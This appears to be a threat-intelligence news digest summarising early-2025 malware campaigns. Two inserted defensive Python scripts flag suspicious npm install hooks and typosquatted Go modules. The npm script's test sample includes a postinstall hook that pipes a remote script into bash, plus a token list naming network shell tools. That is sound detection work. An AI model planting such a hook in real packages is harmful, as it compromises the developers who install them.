Microsoft replacing Remote Desktop app with Windows App in May
Summary: Microsoft will end support for the Remote Desktop app from the Microsoft Store on May 27, 2025, and recommends that users move to its newer Windows App, which has been available since September 2024. Until the Windows App gains support for Remote Desktop Services connections, users are advised to use the built-in Remote Desktop Connection app instead.…
Fortinet Identifies Malicious Packages in the Wild: Insights and Trends from November 2024 Onward
FortiGuard Labs has tracked a series of malicious software packages since November 2024, highlighting the range of techniques attackers use to compromise the systems that install them. The analysis describes tactics such as packages shipping very few files, suspicious install scripts, and command-and-control communication, showing how malicious intent is concealed inside routine software installation.…
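The three indicators named above (low file count, install-time scripts, hardcoded network endpoints) can be checked mechanically before a package is allowed into a build. The following triage script is an added example, not FortiGuard's tooling or the page's own code; it scores an npm-style manifest plus its file list, and the packages, thresholds and token list are constructed assumptions for illustration.

```python
import re

# npm lifecycle hooks that run automatically at install time; the first place
# to look when a package is suspected of carrying an install-time payload.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Tokens that rarely belong in a legitimate install hook (assumed heuristic list).
SUSPICIOUS_TOKENS = (
    "curl ", "wget ", "base64", "eval(", "child_process", "exec(",
    "powershell", "/dev/tcp", "nc ", "bash -c", "python -c",
)

# URLs or raw IPv4 endpoints inside an install hook suggest a download-and-execute
# or beaconing stage rather than a build step.
ENDPOINT_RE = re.compile(r"(?:https?://[^\s\"']+|\b(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?)")

LOW_FILE_COUNT = 3  # assumed threshold: real libraries almost always ship more files


def score_package(manifest: dict, files: list[str]) -> dict:
    """Score one package from its parsed package.json and the file list of its tarball."""
    findings, score = [], 0
    scripts = manifest.get("scripts", {}) or {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        findings.append(f"lifecycle hook {hook!r}: {cmd}")
        score += 2
        for tok in SUSPICIOUS_TOKENS:
            if tok in cmd:
                findings.append(f"  suspicious token {tok.strip()!r} in {hook}")
                score += 3
        for endpoint in ENDPOINT_RE.findall(cmd):
            findings.append(f"  hardcoded endpoint {endpoint} in {hook}")
            score += 3
    if len(files) <= LOW_FILE_COUNT:
        findings.append(f"low file count: {len(files)} file(s)")
        score += 2
    # A package that only ships a manifest and a hook has nothing to import.
    if not any(f.endswith((".js", ".mjs", ".cjs", ".ts")) for f in files if f != "package.json"):
        findings.append("no importable source files shipped")
        score += 1
    return {"name": manifest.get("name", "?"), "score": score, "findings": findings}


def triage(packages, threshold: int = 5) -> list[str]:
    """Names of packages whose score reaches the (assumed) review threshold."""
    return [r["name"] for r in (score_package(m, f) for m, f in packages) if r["score"] >= threshold]


# Constructed samples, not real packages. 203.0.113.10 is a documentation-only address.
BENIGN = (
    {"name": "left-padder", "version": "1.2.0", "scripts": {"test": "node test.js"}},
    ["package.json", "README.md", "index.js", "lib/pad.js", "test.js"],
)
MALICIOUS = (
    {"name": "lodash-utls", "version": "0.0.1",
     "scripts": {"postinstall": "curl -s http://203.0.113.10:8080/i.sh | bash"}},
    ["package.json", "index.js"],
)

if __name__ == "__main__":
    for manifest, files in (BENIGN, MALICIOUS):
        result = score_package(manifest, files)
        print(result["name"], result["score"], *result["findings"], sep="\n  ")
    print("flagged:", triage([BENIGN, MALICIOUS]))
```

The score is deliberately additive: a lone `postinstall` hook is common in legitimate native-module packages, but a hook that also pipes a remote script into a shell, in a package with two files, is the pattern the report describes and scores well past the threshold.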
RST TI Report Digest: 10 Mar 2025
This week’s threat intelligence report reveals a range of sophisticated cyber threats, including targeted multistage malware attacks, ransomware groups adopting new backconnect malware, and social engineering tactics employed in recruitment scams. Notable threats included a campaign targeting aviation and transport in the UAE, while other malware leveraged social media for distribution.…
Safe{Wallet} Confirms North Korean TraderTraitor Hackers Stole $1.5 Billion in Bybit Heist
Summary: Safe{Wallet} disclosed details of the attack on Bybit, attributed to the North Korean state-sponsored TraderTraitor group. The attackers used social engineering to compromise a Safe{Wallet} developer’s machine and hijack AWS session tokens, which let them operate covertly inside the environment. The incident underscores serious security weaknesses in the cryptocurrency industry, which faces record losses from hacks in 2025.…
Unmasking the new persistent attacks on Japan
Cisco Talos discovered a campaign by an as yet unattributed attacker targeting organizations in Japan since January 2025. The attacker primarily exploits CVE-2024-4577, a PHP-CGI argument injection flaw on Windows, for initial access and then deploys Cobalt Strike and related post-exploitation tooling. The activity includes credential theft, system compromise, and potential lateral movement, and spans multiple industries.…
Typosquatted Go Packages Deliver Malware Loader Targeting Li…
A recent analysis reveals a sustained malicious campaign against the Go ecosystem that uses typosquatted packages to distribute loader malware to Linux and macOS systems. At least seven packages were identified impersonating popular Go libraries, with a notable focus on deceiving financial-sector developers. The malware uses obfuscation and has been linked to multiple malicious domains, and the packages remained available through the Go Module Mirror.…
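Typosquatted module paths differ from the library they imitate by one or two characters, so a go.mod can be screened against an allowlist of known module paths by edit distance. The script below is an added example written for this digest, not code from the cited analysis; the allowlist, the distance cut-off and the sample go.mod are constructed assumptions.

```python
# Constructed allowlist of well-known module paths. In practice this would come
# from the organisation's approved-dependency list rather than be hardcoded.
KNOWN_MODULES = [
    "github.com/spf13/cobra",
    "github.com/gorilla/mux",
    "github.com/go-sql-driver/mysql",
    "golang.org/x/crypto",
    "github.com/ethereum/go-ethereum",
]


def edit_distance(a: str, b: str) -> int:
    """Optimal-string-alignment distance: insert, delete, substitute, and
    adjacent transposition each cost 1 (catches swapped letters like 'gorlila')."""
    prev_prev, prev = None, list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cost = 0 if ca == cb else 1
            d = min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost)
            if i > 1 and j > 1 and ca == b[j - 2] and a[i - 2] == cb:
                d = min(d, prev_prev[j - 2] + 1)
            cur.append(d)
        prev_prev, prev = prev, cur
    return prev[-1]


def requires_from_gomod(text: str) -> list[str]:
    """Module paths from the require directives of a go.mod (single-line and block forms)."""
    mods = []
    for raw in text.splitlines():
        line = raw.split("//", 1)[0].strip()   # drop '// indirect' and other comments
        if line.startswith("require "):
            line = line[len("require "):].strip()
        if not line or line in ("(", ")"):
            continue
        if line.startswith(("module ", "go ", "toolchain ", "replace ", "exclude ", "retract ")):
            continue
        parts = line.split()
        if len(parts) >= 2 and parts[1].startswith("v"):
            mods.append(parts[0])
    return mods


def suspicious_modules(module_paths, known=KNOWN_MODULES, max_distance: int = 2):
    """(module, closest_known, distance) for modules that are not on the allowlist
    but sit within max_distance edits of an entry on it."""
    hits = []
    for mod in module_paths:
        if mod in known:
            continue
        closest = min(known, key=lambda k: edit_distance(mod, k))
        d = edit_distance(mod, closest)
        if d <= max_distance:
            hits.append((mod, closest, d))
    return hits


# Constructed go.mod with two look-alike module paths mixed in with genuine ones.
SAMPLE_GO_MOD = """\
module example.com/trading-bot

go 1.22

require (
    github.com/spf13/cobra v1.8.0
    github.com/gorila/mux v1.8.1
    github.com/ethereum/go-etherum v1.13.0 // indirect
    golang.org/x/crypto v0.21.0
)
"""

if __name__ == "__main__":
    for mod, closest, d in suspicious_modules(requires_from_gomod(SAMPLE_GO_MOD)):
        print(f"{mod} is {d} edit(s) from {closest}")
```

Exact allowlist matches are skipped, so the check only fires on near-misses; a cut-off of two edits is tight enough to avoid flagging unrelated modules that merely share a hosting prefix.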
Defending against USB drive attacks with Wazuh
Summary: USB drive attacks are a long-standing threat in which everyday USB devices carry malware past network defenses, as the Stuxnet worm demonstrated. Such attacks can lead to data breaches, financial losses, and reputational damage. Wazuh provides monitoring capabilities for detecting and responding to USB device activity across various operating systems.…
Analysis of the Relationship Between Emergency Martial Law Themed APT Attacks and the Kimsuky Group
This article analyzes APT attacks that exploit political and social issues in South Korea, focusing on a spear phishing campaign that distributes malicious files by email. The campaign targets users working in North Korea-related fields and relies on social engineering to avoid antivirus detection. It stresses the need for Endpoint Detection and Response (EDR) systems to identify and mitigate such threats.…
RST TI Report Digest: 03 Mar 2025
This week’s threat intelligence report from RST Cloud analyzes various cybersecurity threats targeting different sectors and establishments. Noteworthy attacks include FatalRAT impacting industrial organizations in the Asia-Pacific region, with an advanced delivery mechanism utilizing DLL sideloading. The Silent Killers report discusses a large-scale exploitation of legacy drivers, while other reports cover threats like Koi Stealer, AMOS Stealer, and attackers affiliated with the Hellcat and Silver Fox groups targeting governmental and healthcare sectors, respectively.…
Turkey’s Attacking APT Groups and Attack Analyses
This study offers a comprehensive examination of Advanced Persistent Threats (APTs), focusing on their dynamics, techniques employed, and preventive measures. The article discusses the identification of APTs, the reasons behind attacks on Turkey, and their geopolitical and economic impacts. Furthermore, it explains the concept of Tactics, Techniques, and Procedures (TTP), their subdivision into sub-techniques, and details effective strategies to mitigate APT attacks.…
5,000 Phishing PDFs on 260 Domains Distribute Lumma Stealer via Fake CAPTCHAs
Summary: A widespread phishing campaign utilizing fake CAPTCHA images in PDF documents hosted on Webflow’s CDN has been uncovered, aimed at distributing Lumma Stealer malware. The campaign has affected over 1,150 organizations and more than 7,000 users, predominantly in North America, Asia, and Southern Europe. Attackers employ SEO tactics to lure victims and have been observed uploading malicious PDFs to legitimate online libraries, further amplifying the threat.…
Poseidon Mac Malware Hiding Within PKG Files to Evade Detections
Summary: Cybersecurity researchers have identified Poseidon, a macOS-targeting trojan that uses PKG installers and their preinstall scripts to gain a foothold. At just 207 bytes, the installer-stage payload evades detection before fetching the component that steals sensitive data. Its techniques include anti-debugging measures and evasion of macOS security features, making it one of the most active macOS infostealers.…
Summary: A recent report from Unit 42 reveals a new campaign of cyberattacks linked to North Korea, targeting macOS users, particularly in the cryptocurrency sector. The malware RustDoor and Koi Stealer are designed to exfiltrate sensitive data while evading detection through macOS-specific techniques, often luring victims with fake job offers.…
Securonix Threat Labs Monthly Intelligence Insights – January 2025
The Monthly Intelligence Insights report for January 2025 by Securonix Threat Labs highlights critical threats, incidents, and responses, including the Cyberhaven breach and the exploitation of Ivanti vulnerabilities. Organizations are urged to strengthen their defenses by patching promptly and monitoring more closely.…
RustDoor and Koi Stealer for macOS Used by North Korea-Linked Threat Actor to Target the Cryptocurrency Sector
This article discusses the rise of macOS-targeting malware, particularly from North Korean APT groups, focusing on two samples: RustDoor and Koi Stealer. RustDoor masquerades as a legitimate software update, while the previously undocumented Koi Stealer primarily aims to steal sensitive data, including cryptocurrency wallet information.…
New ‘Auto-Color’ Linux Malware Targets North America, Asia
Summary: Palo Alto Networks has reported on a new Linux malware named Auto-Color, which provides threat actors with backdoor access to compromised devices. This malware has primarily targeted universities and government entities in North America and Asia, requiring explicit execution by the victim for activation. Auto-Color employs advanced evasion techniques, making it challenging to detect and remove without specialized software.…